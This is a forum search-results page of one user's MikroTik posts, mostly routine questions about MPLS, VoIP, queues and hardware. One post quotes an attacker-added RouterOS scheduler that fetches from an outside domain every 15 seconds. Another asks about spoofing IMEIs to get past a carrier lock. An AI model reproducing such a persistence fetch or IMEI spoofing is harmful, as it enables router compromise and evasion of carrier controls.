Community discussions

Search found 69 matches

  • 1
  • 2
by sewlist
Tue Jun 04, 2019 9:57 am
Forum: General
Topic: Mikrotik icmp traffic from itself?
Replies: 3
Views: 220

Re: Mikrotik icmp traffic from itself?

Thank you. I should have looked up ICMP codes

Will see if i can find the culprit customer/s

S
by sewlist
Tue Jun 04, 2019 9:19 am
Forum: General
Topic: Mikrotik icmp traffic from itself?
Replies: 3
Views: 220

Mikrotik icmp traffic from itself?

I Have switched on filter logging on output chain and ive noticed the router is pinging/ip scanning from itself random IPs It has has no internet connectivity, but does passthrough traffic for customers example on router chain=output action=log protocol=icmp logs on router, where my IP is 10.175.0.7...
by sewlist
Wed Dec 12, 2018 3:12 pm
Forum: General
Topic: Routerboard Hacked question
Replies: 4
Views: 594

Re: Routerboard Hacked question

Agree with all of you, Rookie error from my teams

We will reinstall router clean

S
by sewlist
Wed Dec 12, 2018 3:06 pm
Forum: General
Topic: Routerboard Hacked question
Replies: 4
Views: 594

Routerboard Hacked question

Hi Guys My installer installed a new router, and 5mins later before we could upgrade it was hacked Only thing we saw that was changed was this scheduler added Does anyone know what this mean 0 X name="U6" start-time=startup interval=15s on-event=/tool fetch url=http://fanmusic.xyz/poll/25e93549-c1a1...
by sewlist
Mon May 14, 2018 8:56 pm
Forum: General
Topic: voltage monitor snmp disappear
Replies: 0
Views: 200

voltage monitor snmp disappear

Our 1100 on the tower we use icinga2 to monitor voltage on battery. This router is on battery power however we receive every now and then "unknown" states sending alarms to tower techs which will respond to this notice Looking at system health print i see the voltage go missing fan-mode: auto use-fa...
by sewlist
Sat Mar 24, 2018 5:01 pm
Forum: Announcements
Topic: Future of LTE products, user feedback requested
Replies: 80
Views: 17123

Re: Future of LTE products, user feedback requested

+1 for dual sim card


ensure support for LTE-A if not already
by sewlist
Fri Nov 03, 2017 8:25 am
Forum: General
Topic: Mikrotik RB with huwaie router WIFI
Replies: 1
Views: 279

Mikrotik RB with huwaie router WIFI

We have a strange issue We using the huwaei b315 LTE eg, 192.168.8.1, We disable DHCP on huwaie, and only keep the WIFI active Plug mikrotik into port 1 of huwaie ether1 : 192.168.8.2 ether1: 192.168.0.1 enable dhcp for 192.168.0.0/24 on ether1 on mikrotik Clients connect to WIFI on huwaie dont get ...
by sewlist
Wed Nov 01, 2017 11:19 am
Forum: General
Topic: SXT LTE
Replies: 4
Views: 631

Re: SXT LTE

Vendor asking for our IMEI numbers. Is there a possible range for mikrotik cpe?

Many Thanks
by sewlist
Wed Nov 01, 2017 10:27 am
Forum: General
Topic: SXT LTE
Replies: 4
Views: 631

Re: SXT LTE

I understand. however we need a temp solution, we have 100 devices installed.

please PM me if there is possible temp solution
by sewlist
Wed Nov 01, 2017 10:06 am
Forum: General
Topic: SXT LTE
Replies: 4
Views: 631

SXT LTE

Our vendor has locked all LTE towers to huwaei devices, resulting in all our outdoor cpe's being disconnected

Would there be a way to bypass this?. Maybe spoofing the imei? . meanwhile we trying to get mikrotik cpe's approved

Many thanks

Sewlist
by sewlist
Fri Nov 13, 2015 2:24 pm
Forum: General
Topic: Dynamic items unchangeable - why?
Replies: 44
Views: 7170

Re: Dynamic items unchangeable - why?

please dont fix the wrong bugs, we need to change dynamic queue values as previous posters. This means only we will stay stuck on V6.31 as its now a feature that was removed

My 2 cents

Sew
by sewlist
Tue Sep 15, 2015 9:00 am
Forum: General
Topic: fasttrack address-list
Replies: 0
Views: 366

fasttrack address-list

My 1100AH is running on 90% cpu, im trying to reduce the load with fasttrack I have used this rule to add "fast" customers to save load on the 1100AH add action=fasttrack-connection chain=forward connection-state=established,related src-address-list=fasttrack add chain=forward connection-state=estab...
by sewlist
Mon Feb 02, 2015 12:14 pm
Forum: General
Topic: M3P + ubnt + mtu issue
Replies: 0
Views: 372

M3P + ubnt + mtu issue

Please can someone assist Seems from V6 m3p on mikrotik the packing has a mtu issue, however forwarding works normally. Once enabled i cannot telnet from RB to RB, version range from 1200 /493G /750 etc This is easily to simulate, simply enable simple packing with latest ROS and ubnt device with air...
by sewlist
Sat Jul 05, 2014 7:10 pm
Forum: General
Topic: Simplest QoS setup for SIP VoIP - without max bandwidth
Replies: 8
Views: 2574

Re: Simplest QoS setup for SIP VoIP - without max bandwidth

use the CoS on the wireless with ToS mappings, I believe there is a set-priority option for mikrotik , however we use ubnt combined with MT change voip dscp and give priority to sip over the air, do pppoe for data and use non pppoe for voice and prioritise like this if u want to only do via pppoe, u...
by sewlist
Sun Jun 01, 2014 7:19 pm
Forum: General
Topic: M3P ip packing with RB SXT G5-HPnD r2
Replies: 2
Views: 911

Re: M3P ip packing with RB SXT G5-HPnD r2

check your pps rate without it and with it and see the difference then u can tell if it works or now

S
by sewlist
Thu Apr 03, 2014 12:38 pm
Forum: General
Topic: m3p + dscp
Replies: 2
Views: 832

Re: m3p + dscp

nope

ubnt tcpdump shows malformed info, only use packing when u have voip only clients or very high load pps rate. if only there was a way to tag the m3p packet to 48

S
by sewlist
Sun Feb 02, 2014 8:33 am
Forum: General
Topic: Routeros 6.6 - simple queue problem
Replies: 15
Views: 5931

Re: Routeros 6.6 - simple queue problem

I had similiar problem. I can't remember what i did, but i had something set to queue type ethernet-default kind=none and then my downloads sky rocketed . it was something to do with pfifo.

It was a 16Mbit customer struggling as soon as i changed the type they got it all

My 2 cents

Sew
by sewlist
Thu Dec 12, 2013 9:56 am
Forum: General
Topic: m3p behaviour
Replies: 0
Views: 386

m3p behaviour

Hi ive enabled ip packing with compress-headers on a very busy link, 10mbit +, there is voip everything going through this link. I've noticed only the RX packets p/s is dropping from over 2000 pps to few 100, but the TX is staying the same amount of pps. Does anybody know why it will only minimse on...
by sewlist
Thu Mar 14, 2013 10:57 am
Forum: General
Topic: m3p + dscp
Replies: 2
Views: 832

m3p + dscp

I need some advice on this We have a ptp link with ubnt . Mikrotik both ends for routing We push quite alot of voip on it I've noticed if i enabled ip packing simple which drasticly reduces the pps load which is perfect on the ubnt they use dscp value 48 for highest voice priority. If i do tcpdump o...
by sewlist
Fri Sep 14, 2012 3:35 pm
Forum: General
Topic: mac-protocol question
Replies: 2
Views: 917

Re: mac-protocol question

ok thanks researching shows that value as stp priority Specifies the STP-bridge priority; the valid values are 0, 4096 , 8192 , 12288, 16384, 20480, 24576, 28672, 32768, 36864 , 40960, 45056, 49152 Im using bridge filter to do QoS on these kinda traffic by protocol as i have mpls switching on that r...
by sewlist
Fri Sep 14, 2012 3:22 pm
Forum: General
Topic: mac-protocol question
Replies: 2
Views: 917

mac-protocol question

Ive torched as follows : I've added a Ubnt AP into a bridge with pppoe-server on this bridge1 as well, and some other clients with mpls and vlan What is mac-protocol 36864?, Is this vlan traffic?, I cant seem to find reference on that > tool torch bridge1 mac-protocol=any MAC-PROTOCOL TX RX TX-PACKE...
by sewlist
Thu Aug 16, 2012 1:18 pm
Forum: General
Topic: Kernel Panic on RB1100AH2
Replies: 4
Views: 1134

Re: Kernel Panic on RB1100AH2

Sorry the router is to crucial to sit and wait for downtime

I've downgraded the cpu speed to 800mhz and disabled connection tracking as its a LSR only

so far uptime is good

S
by sewlist
Tue Aug 14, 2012 1:30 pm
Forum: General
Topic: Kernel Panic on RB1100AH2
Replies: 4
Views: 1134

Re: Kernel Panic on RB1100AH2

I have same problem with random reboots, im on 5.18, I have about 50 vlans on the board and it passes quite a bit of traffic with mpls enabled and ospf. I've just had a reboot now. here is my log, notice the "current-firmware" goes missing, Ill upgrade afterhours to 5.19 to see if it helps. Did you ...
by sewlist
Fri Jul 13, 2012 1:07 pm
Forum: General
Topic: ip packing and traffic squeezing
Replies: 0
Views: 517

ip packing and traffic squeezing

Guys, What about something like this in mikrotik - http://www.trafficsqueezer.org/ , This looks promising, only problem is we can't install a linux OS at every high point, would be madness m3p is good, but only aggregates and compresses, this trafficsqueezers optmises WAN traffic, would be perfect f...
by sewlist
Wed Jun 27, 2012 3:26 pm
Forum: Forwarding Protocols
Topic: mpls latency question
Replies: 10
Views: 2792

Re: mpls latency question

Okay even though latency is higher, normal packet forwarding should still be faster?, so you say icmp will only be affected?

S
by sewlist
Wed Jun 27, 2012 8:53 am
Forum: Forwarding Protocols
Topic: mpls latency question
Replies: 10
Views: 2792

Re: mpls latency question

Okay i will have to dig a bit deeper after hours again... If i go to each hop and ping the peers, the latency is 1ms, but only on the forwarding its causing the latency. i suspect the 4xx version is doing this, also for mikrotik enigineers, the ports is both on port 8 on the 1100 and the 493g, I kno...
by sewlist
Tue Jun 26, 2012 10:55 pm
Forum: Forwarding Protocols
Topic: mpls latency question
Replies: 10
Views: 2792

Re: mpls latency question

I lowered as suggested , here is the tracepath results, pmtu now 1496, this is mind boggling for me, I suspect this is causing issues on the voip under load , any other suggestions, the mpls forwarding table is about 1900 entries hop 4 is a rb1100 with latest version and default mtu's wireless is ub...
by sewlist
Tue Jun 26, 2012 9:30 pm
Forum: Forwarding Protocols
Topic: mpls latency question
Replies: 10
Views: 2792

mpls latency question

I have a MTR running , now my MPLS for the network starts at hop 5, strangely the latency gone up quite higher MPLS enabled: latency on hop 5 is 23.5ms HOST: Loss% Snt Last Avg Best Wrst StDev 2. 10.249.5.198 0.0% 2 0.5 0.3 0.2 0.5 0.2 3. 10.249.2.180 0.0% 2 0.9 1.1 0.9 1.2 0.2 4. 10.249.4.25 0.0% 2...
by sewlist
Sun Jun 10, 2012 11:52 am
Forum: Forwarding Protocols
Topic: VPLS having problems passing traffic
Replies: 13
Views: 9726

Re: VPLS having problems passing traffic

Im not sure if this would help, I had mtu problem on my rb1200 routers with mpls, turned out was bug, had to upgrade.

rb1200 ether6,ether7,ether8 did not support big packets when linked at 10/100Mbps;

My 2 cents

S
by sewlist
Thu Jan 26, 2012 6:17 pm
Forum: General
Topic: Best VPN for site-to-site
Replies: 5
Views: 3531

Re: Best VPN for site-to-site

MPLS/VPLS layer 2 or layer 3 is the best and fastest form of vpn, rest add overhead per packet where mpls is only 4 bytes per packet where GRE add up to 40

S
by sewlist
Fri Jan 06, 2012 12:32 pm
Forum: Forwarding Protocols
Topic: How to block ads from Facebook? Thanks
Replies: 3
Views: 1718

Re: How to block ads from Facebook? Thanks

squid proxy with adzapper

S
by sewlist
Fri Jan 06, 2012 12:29 pm
Forum: Forwarding Protocols
Topic: Voice problem due to mikrotik router
Replies: 3
Views: 1419

Re: Voice problem due to mikrotik router

Under high load "/ip firewall service-port disable sip" , this causes delay in sip traffic initial connection

Regarding your setup, it sounds like u have one way speech, check codecs both ways, check all your sip config etc, check also for sip proxies to use

Good Luck

S
by sewlist
Thu Dec 22, 2011 2:57 pm
Forum: Beginner Basics
Topic: RB 450G is hot?
Replies: 35
Views: 19201

Re: RB 450G is hot?

some more intersting info This router is so important, I cant even down it for a minute and we get in trouble with the banks voip, waiting in christmas to replace it sometime :-) just noticed this now on the 450g, cpu peaks to 100% easily at times, pushes around 3M of g729 voip thru with around 30M ...
by sewlist
Wed Aug 31, 2011 2:27 pm
Forum: General
Topic: Radius backup accounting
Replies: 4
Views: 4405

Radius backup accounting

I have setup radius backup on all my towers using freeradius I have setup mysql replication between master and slave and vice versa so all accounting info is up2date always, so its a complete hot backup in case of failure, however we notices that the NAS(mikrotik) is sending account info to both rad...
by sewlist
Wed Aug 17, 2011 12:48 pm
Forum: Forwarding Protocols
Topic: mpls mtu on rb1200
Replies: 0
Views: 617

mpls mtu on rb1200

I've upgraded from 750g to 1200 as we needed more ports to add our wireless devices I run mpls ldp over the link and my ubnt backbone mtu is set to 1518 as its all over set like that and works fine, we dont use vpls yet, only layer3 vpns since the upgrade to the 1200 if i connect thru to another LSR...
by sewlist
Mon Apr 18, 2011 9:03 am
Forum: General
Topic: Voice (VOIP) issues
Replies: 4
Views: 1676

Re: Voice (VOIP) issues

Not sure what kinda issues u guys expierencing, but we run quite a large voip network with mikrotik into our voip provider call quality was fine, but the call session setup was the problem . We disabled sip helper on ALL our routers,seems to be problem at certain volume, we did not even have nat on ...
by sewlist
Sun Aug 29, 2010 10:18 am
Forum: General
Topic: Fight against rapidshare
Replies: 84
Views: 27897

Re: Fight against rapidshare

Not sure if this might help, we also quite a large WISP, we push heavy traffic, found that using a squid proxy server can save alot of data and u can manage certain sites my problem was windowsupdates during the day as we have a 100mb internet breakout, so I slow it down to very small speed during t...
by sewlist
Tue Aug 10, 2010 7:27 pm
Forum: General
Topic: RB 433 showing 100Mhz cpu
Replies: 3
Views: 704

Re: RB 433 showing 100Mhz cpu

thanks you, all is okay, didnt know u can set cpu-freq

S
by sewlist
Tue Aug 10, 2010 2:21 pm
Forum: General
Topic: RB 433 showing 100Mhz cpu
Replies: 3
Views: 704

RB 433 showing 100Mhz cpu

I've noticed only now on one of my old towers after upgrade that my cpu is show 100Mhz cpu speed instead of 300Mhz What could cause this? cpu clocking with the jumpers? system resource print uptime: 2w1d21h55m40s version: "4.9" free-memory: 43744kB total-memory: 62432kB cpu: "MIPS 24K V7.4" cpu-coun...
by sewlist
Tue Jul 27, 2010 4:11 pm
Forum: Forwarding Protocols
Topic: MPLS neighbourg disconnects
Replies: 3
Views: 1324

Re: MPLS neighbourg disconnects

I managed to get it more stable

I set something like this both sides, seems to got it more stable
/mpls ldp neighbor
add comment="" disabled=no send-targeted=yes transport=10.255.255.222

S
by sewlist
Tue Jul 27, 2010 12:58 pm
Forum: Forwarding Protocols
Topic: MPLS neighbourg disconnects
Replies: 3
Views: 1324

Re: MPLS neighbourg disconnects

Any news MIkrotik support, bit of speed would help, We do upgrades after 12 at nite to avoid downtime, now i have problematic mpls behaviours

Thanks

S
by sewlist
Tue Jul 27, 2010 11:17 am
Forum: Forwarding Protocols
Topic: MPLS LDP neighbor problem
Replies: 4
Views: 2939

Re: MPLS LDP neighbor problem

Hey, this started happening to me as well, I think mine was stable on V4.6, then upgrade to 4.10 when i start to notice this

It appears to be a load issue, it looks like it happens when the links become busy

Did u get your flapping solved?

S
by sewlist
Tue Jul 27, 2010 10:37 am
Forum: Forwarding Protocols
Topic: MPLS neighbourg disconnects
Replies: 3
Views: 1324

MPLS neighbourg disconnects

I got a strange problem in my MPLS cloud one of my core routers is a 750g with a bulletM5 on port 4 Remote side is 433AH with R52 radio Signal is -70, CCQ is 80% + OSPF on network, there is about 800 routes in the routing tables, but all is stable I have about 50 MPLS layer 3 clients in the mpls net...
by sewlist
Thu Apr 15, 2010 3:26 pm
Forum: General
Topic: SIP Problem
Replies: 7
Views: 1706

Re: SIP Problem

Hi There

Did u find a solution for your problem, my new post seems somewhat related while we also losing some connection, tracking it seems there is no problem

S
by sewlist
Thu Apr 15, 2010 3:01 pm
Forum: General
Topic: routeros with VOIP and Wireless
Replies: 2
Views: 628

routeros with VOIP and Wireless

hi Guys I need some advice, We have quite a large network, im one of the techs trying resolve we have a wireless link directly into the voip providers backbone, also the voip ip ranges is routed directly from their datacenter. This is to avoid NAT problems each client gets a unique voip range routed...
by sewlist
Thu Oct 22, 2009 6:28 pm
Forum: Wireless Networking
Topic: long distance link keeps dropping
Replies: 5
Views: 970

Re: long distance link keeps dropping

almost from the beginning, on nstreme Disabled i had alot of duplicate packets, once nstreme enabled, the link became stable we then had power issue at tower which we sorted out i see the links very sensitive to dropping, its stays up for hours , then if i work on the other link which is dropping al...
by sewlist
Tue Oct 20, 2009 7:46 pm
Forum: Forwarding Protocols
Topic: most stable VPLS setup
Replies: 11
Views: 6995

Re: most stable VPLS setup

W've been using LDP based VPLS for a while, very solid in my opinion using Layer 3 MPLS as well with vrf's , its amazing networking for me, we run about 25+ clients through the layer3 with bgp vpn4-route we mostly wireless ISP, but we have a solution for ADSL customers coming into the MPLS cloud and...
by sewlist
Tue Oct 20, 2009 7:39 pm
Forum: Wireless Networking
Topic: long distance link keeps dropping
Replies: 5
Views: 970

long distance link keeps dropping

HI Guys Maybe someone can help me here We have a tower with 2 antenna pointing to 2 diffrent directions, about 40-50 KM, both side equipment is the same the grids is 31 DBI with R52H on both sides with VP, boards is 433AH We have a good -70 signals, and nstreme is enabled, RouterOS versions is 3.30 ...
by sewlist
Mon Jul 13, 2009 7:40 pm
Forum: RouterBOARD hardware
Topic: RB 600A compact flash problem
Replies: 4
Views: 628

Re: RB 600A compact flash problem

ha, thanks, just thought about that, but user has permissions, another strange thing, when i telnet in this is my banner when i log in Escape character is '^]'. Login: admin Password: RouterOS 3.15 (c) 1999-2008 doesnt even show the mikrotik ssh/telnet banner on login, so something defnitely is wron...
by sewlist
Mon Jul 13, 2009 6:58 pm
Forum: RouterBOARD hardware
Topic: RB 600A compact flash problem
Replies: 4
Views: 628

Re: RB 600A compact flash problem

Problem is I cannot upload to it, it wont save anything on the nand,

im gona have to export the whole routerOS or something , but problem is I cannot down that router easily, its quite a important router

any other advice?

S
  • 1
  • 2